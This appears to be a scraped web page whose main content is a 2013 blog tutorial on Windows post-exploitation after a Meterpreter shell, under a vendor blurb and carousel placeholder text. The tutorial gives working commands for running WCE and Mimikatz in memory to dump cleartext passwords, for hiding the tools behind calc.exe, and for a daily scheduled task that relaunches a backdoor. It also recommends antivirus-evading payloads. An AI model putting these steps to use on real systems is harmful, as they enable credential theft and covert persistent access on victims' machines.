platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Schedule Task in windows after Exploitation.
published on 2013-10-04 17:50:00 UTC by nirav desai Content:
Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put their method here.
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.
First create one batch file , put following code in it
@echo off "C:\Documents and Settings\nirav\Desktop\backdoor.exe"
Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.
Get clear text password:-
Following are different methods to get clear text password of windows.
(1)using mimikatz or wce get clear text password of victim.
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
So till now i upload one batch file ; backdoor & get clear text password.
Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.
C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00
It will ask to enter password which we got before.
You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.